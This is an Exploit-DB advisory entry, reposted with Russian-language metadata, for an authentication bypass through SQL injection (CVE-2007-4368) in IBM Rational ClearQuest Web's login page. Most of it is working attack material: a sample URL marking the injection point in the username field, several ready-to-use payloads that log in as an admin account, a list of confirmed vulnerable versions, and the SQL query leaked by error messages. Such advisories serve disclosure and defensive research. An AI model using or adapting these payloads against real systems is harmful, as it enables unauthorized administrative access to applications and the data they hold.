- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4286
- Проверка EDB
-
- Пройдено
- Автор
- S4SQUATCH
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2007-4368
- Дата публикации
- 2007-08-14
Код:
+==============================================================+
+ IBM Rational ClearQuest Web Login Bypass (SQL Injection) +
+==============================================================+
DISCOVERED BY:
==============
SecureState
sasquatch - [email protected]
rel1k - [email protected]
HOMEPAGE:
=========
www.securestate.com
AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to SQL injection...
SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE
Log in as "admin":
==================
' OR login_name LIKE '%admin%'--
(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...
Confirmed against:
==================
version 7.0.0.1 Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630
FULL SQL Statement is spit back in error message:
=================================================
SELECT
master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
master_users
WHERE
login_name = 'INJECTION GOES HERE
# milw0rm.com [2007-08-14]
- Источник
- www.exploit-db.com